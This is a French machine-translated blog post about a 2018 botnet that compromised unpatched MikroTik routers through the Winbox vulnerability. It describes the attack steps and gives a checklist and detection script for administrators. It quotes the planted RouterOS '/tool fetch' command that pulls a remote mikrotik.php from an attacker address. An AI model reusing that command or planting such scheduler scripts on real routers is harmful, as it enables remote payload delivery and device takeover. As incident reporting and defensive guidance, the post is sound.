Nouvelle vulnérabilité Mikrotik? Non, mais cela vaut la peine de vérifier vos appareils.



Le 2 août, j'ai reçu le bulletin «MikroTik: URGENT security Advisory» indiquant qu'un botnet utilisait la vulnérabilité Winbox Service pour pirater et infecter des appareils.

D'après le texte de la newsletter, il est devenu clair que la vulnérabilité a été corrigée le 23 avril 2018 dans la version v6.42.1. J'ai commencé à rechercher des appareils sponsorisés et j'ai trouvé plusieurs routeurs avec 6.40.1, dont l'un était infecté.

Que fait un script attaquant?

  • Obtient une liste d'utilisateurs par le biais d'une vulnérabilité (c'est-à-dire que le changement d'administrateur en autre chose ne sauvegarde pas).
  • Tente de se connecter avec toutes les connexions reçues et élimine celles bloquées.
  • Après avoir trouvé la connexion active, obtient son mot de passe, se connecte au système.

Ensuite:

  • Désactive toutes les règles de suppression sur le pare-feu.
  • Active les chaussettes (IP - Socks) sur un port non standard, dans mon cas 4145.
  • Ajoute l' /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no script /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no dans System - Scripts
  • Ajoute un script exécuté à System - Scheduler.
  • Supprime les scripts existants (rapportés par le forum Mikrotik).

L'attaque est venue de l'adresse 95.154.216.151, qui appartient à iomart Hosting Limited, leur a écrit un message via le site, mais il n'y a pas encore de réaction, l'adresse est active.

L'adresse 95.154.216.166 est également active, mais ne contient aucun fichier mikrotik.php.

Ici vous pouvez voir les messages des victimes:
www.abuseipdb.com/check/95.154.216.151
www.abuseipdb.com/check/95.154.216.166

Si votre Mikrotik n'est pas encore mis à jour et que le port Winbox est ouvert à tous, assurez-vous de vérifier l'appareil.

  1. Nous vérifions que les règles de suppression dans IP - Pare-feu sont actives.
  2. Nous vérifions les chaussettes, doit être déconnecté et le port doit être par défaut - 1080.
  3. Recherchez les scripts restants dans Système - Scripts et Système - Planificateur.
  4. Vérification de l'existence du fichier miktorik.php
  5. Nous faisons / exportons dans le terminal et vérifions la configuration avec nos yeux.

L'utilisateur de gotsprings sur le forum Mikrotik a suggéré cette option:

 :if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"} :if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"} :if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."} :if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."} :if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."} 

Ouvrez votre journal et regardez les résultats. Si vous avez un résultat avec "!" vous pourriez avoir un problème.

Évidemment, il est très mauvais de garder le service Winbox ouvert à tous, mais dans certains cas, n'oubliez pas de mettre à jour vos appareils!

Liens connexes:

forum.mikrotik.com/viewtopic.php?f=21&t=137572
thehackernews.com/2018/08/mikrotik-router-hacking.html

Source: https://habr.com/ru/post/fr419205/


All Articles